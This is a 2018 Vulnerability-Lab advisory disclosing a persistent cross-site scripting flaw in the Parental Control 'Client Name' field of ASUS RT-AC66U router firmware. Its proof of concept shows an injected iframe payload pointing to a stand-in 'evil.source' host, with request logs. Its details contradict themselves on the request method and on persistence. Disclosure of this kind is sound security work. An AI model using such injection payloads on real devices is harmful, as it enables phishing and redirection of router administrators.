Document Title:
===============
ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability


Date:
=====
2018-06-27


References:
===========
https://www.vulnerability-lab.com/get_content.php?id=1993


VL-ID:
=====
1993


Common Vulnerability Scoring System:
====================================
3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Introduction:
=============
802.11ac Dual-Band Wireless-AC1750 Gigabit Router. RT-AC66U supports several operation modes to meet 
different requirements. Please select the mode that match your situation. Wireless router mode (Default), 
Access Point(AP) mode or Media bridge. In wireless router/ IP sharing mode, RT-AC66U connects to the 
Internet via PPPoE, DHCP, PPTP, L2TP, or Static IP and shares the wireless network to LAN clients or 
devices. In this mode, NAT, firewall, and DHCP server are enabled by default. UPnP and Dynamic DNS 
are supported for SOHO and home users. Select this mode if you are a first-time user or you are not 
currently using any wired/wireless routers. The ASUS RT-AC66U is a 5th gen dual-band Wi-Fi router, 
and the launch platform for the new ASUS AiCloud service. Its speed reaches 1.75Gbps, utilizing the 
Broadcom 802.11ac Wi-Fi controller and working in 2.4GHz and 5GHz. The 5GHz band supports up to 1.3Gbps, 
exceeding current Gigabit wired transmission and 3X faster than 802.11n. The RT-AC66U offers smooth 
lag-resistant multitasking and super-fast streaming, while ASUS AiRadar intelligently strengthens wireless 
connections via powerful amplification, offering future-proof optimized performance. 

(Copy of the Homepage: https://www.asus.com/Networking/RTAC66U/ )


Abstract:
=========
The vulnerability laboratory core research team discovered mutliple cross site scripting vulnerabilities 
in the official ASUS Wireless Router RT Firmware v3.0.0.4.372_67.


Report-Timeline:
================
2018-06-27:	Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
ASUS
Product: WRT - Wireless Router (UI) v3.0.0.4.372_67


Exploitation-Technique:
=======================
Local


Severity:
=========
Medium


Details:
========
A cross site scripting vulnerability has been discovered in the ASUS Wireless Router RT Firmware v3.0.0.4.372_67.
The cross site scripting web vulnerability allows remote attackers to inject own malicious script codes on the 
application-side of the vulnerable function or service module.

The cross site scripting vulnerability is located in the `Client Name` input field of the `Partental Control` modules. 
The input field for the client name is not secure parsed. Thus allows an attacker to manipulate the client list on index 
of the module. The request method to inject is POST and the attack vector is located on the application-side. Due to no 
reachable cookies in the panel ui, low privileged user accounts are only able to redirect or inject malware to the 
client-side for an execute. First the context is saved client-side and after using apply function the context is 
saved permanently to the image db.

The security risk of the client-side cross site scripting web vulnerability is estimated as medium with a cvss 
(common vulnerability scoring system) count of 3.0. Exploitation of the client-side web vulnerability requires 
a privileged web-application user account and low user interaction. Successful exploitation of the vulnerability 
results in non-persistent phishing, session hijacking, non-persistent external redirect to malicious sources and 
client-side manipulation of affected or connected web module context.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Parental Control

Vulnerable Parameter(s):
[+] Client Name


Proof of Concept:
=================
The cross site vulnerability can be exploited by remote attackers with privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

 
PoC: Exploitation
<tbody><tr><th title="Select all" width="5%" height="30px"><input id="selAll" onclick="selectAll(this, 0);" 
value="" type="checkbox"></th><th width="40%">Clients Name</th><th width="25%">Clients MAC Address</th><th width="10%">
Time Management</th><th width="10%">Add / Delete</th></tr><tr><td style="border-bottom:2px solid #000;" 
title="Enable/Disable"><input id="newrule_Enable" checked="" type="checkbox"></td><td style="border-bottom:2px solid #000;">
<input maxlength="32" style="margin-left:10px;float:left;width:255px;" class="input_20_table" name="PC_devicename" 
onkeypress="" onclick="hideClients_Block();" onblur="if(!over_var){hideClients_Block();}" type="text"><img id="pull_arrow" 
src="images/arrow-down.gif" onclick="pullLANIPList(this);" title="Select the device name of DHCP clients." 
onmouseover="over_var=1;" onmouseout="over_var=0;" height="14px;"><div id="ClientList_Block_PC" class="ClientList_Block_PC">
<a><div onmouseover="over_var=1;" onmouseout="over_var=0;" onclick="setClientIP('JIEMING-NB', '50:E5:49:A2:00:F8');">
<strong>192.168.1.166</strong> ( JIEMING-NB) </div></a><a><div onmouseover="over_var=1;" onmouseout="over_var=0;" 
onclick="setClientIP('JIEMING-MACBOOK', '98:4B:E1:CB:DA:D6');"><strong>192.168.1.188</strong> ( JIEMING-MACBOOK) </div></a>
<a><div onmouseover="over_var=1;" onmouseout="over_var=0;" onclick="setClientIP('JIEMING-PC', 'A8:26:D9:31:2B:49');">
<strong>192.168.1.161</strong> ( JIEMING-PC) </div></a><a><div onmouseover="over_var=1;" onmouseout="over_var=0;" 
onclick="setClientIP('A8:26:D9:31:2B:49', 'A8:26:D9:31:2B:49');"><strong>192.168.1.210</strong>  </div></a>
<!--[if lte IE 6.5]><iframe class="hackiframe2"></iframe><![endif]--></div></td><td style="border-bottom:2px solid #000;">
<input maxlength="17" class="input_macaddr_table" name="PC_mac" onkeypress="return is_hwaddr(this,event)" 
type="text"></td><td style="border-bottom:2px solid #000;">--</td><td style="border-bottom:2px solid #000;">
<input class="url_btn" onclick="addRow_main(16)" value="" type="button"></td></tr><tr id="row0"><td title="1">
<input onclick="genEnableArray_main(0,this);" checked="" type="checkbox"></td><td title=""></td>
<td title="aa:aa:aa:aa:aa:aa">aa:aa:aa:aa:aa:aa</td><td><input class="service_btn" onclick="gen_lantowanTable(0);" 
value="" type="button"></td><td><input class="remove_btn" onclick="deleteRow_main(this);" value="" type="button"></td></tr>
<tr id="row1"><td title="undefined"><input onclick="genEnableArray_main(1,this);" type="checkbox"></td>
<td title="" <iframe="" src="evil.source&quot;">"<iframe src="evil.source</td"><td title="undefined">undefined</td>
<td><input class="service_btn" type="button" onclick="gen_lantowanTable(1);" value=""/></td><td><input 
class="remove_btn" type="button" onclick="deleteRow_main(this);" value=""/></td><tr id="row2"><td title="undefined">
<input type="checkbox" onclick="genEnableArray_main(2,this);" /></td><td title=""></td><td title="undefined">undefined</td>
<td><input class="service_btn" type="button" onclick="gen_lantowanTable(2);" value=""/></td><td>
<input class="remove_btn" type="button" onclick="deleteRow_main(this);" value=""/>
</td></tr></table></iframe></td></tr></tbody>


--- PoC Session Logs [GET] ---
Status: 304[Not Modified]
GET http://event.localhost/nw/_ui/en/ParentalControl.html
Mime Type[text/html]
   Request Header:
      Host[event.localhost]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[http://event.localhost/nw/_ui/en/Advanced_System_Content.html]
      Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
      If-Modified-Since[Thu, 20 Jun 2013 05:45:19 GMT]
      If-None-Match["31793159796dce1:0"]
      Cache-Control[max-age=0]
   Response Header:
      Content-Type[text/html]
      Last-Modified[Thu, 20 Jun 2013 05:45:19 GMT]
      Etag["31793159796dce1:0"]
      Connection[keep-alive]
-
Status: 200[OK]
GET http://event.localhost/nw/_ui/en/evil.source%3C/td 
Mime Type[text/html]
   Request Header:
      Host[event.localhost]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[http://event.localhost/nw/_ui/en/ParentalControl.html]
      Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Content-Type[text/html]
      Server[Microsoft-IIS/7.5]
      X-Powered-By[ASP.NET]
      Content-Length[1245]
      Connection[keep-alive]


Reference(s):
http://event.localhost/
http://event.localhost/nw/
http://event.localhost/nw/_ui/


Solution:
=========
The issue has been reported in 2016 Q4 (2016-11-09) and was finally resolved in 2017 Q3 - Q4 by the asus wrt developer team.


Risk:
=====
The security risk of the persistent cross site scripting web vulnerability in the asus wrt ui is estimated as medium (CVSS 3.0).


Credits:
========
Lawrence Amer [zeroattck@gmail.com] - https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™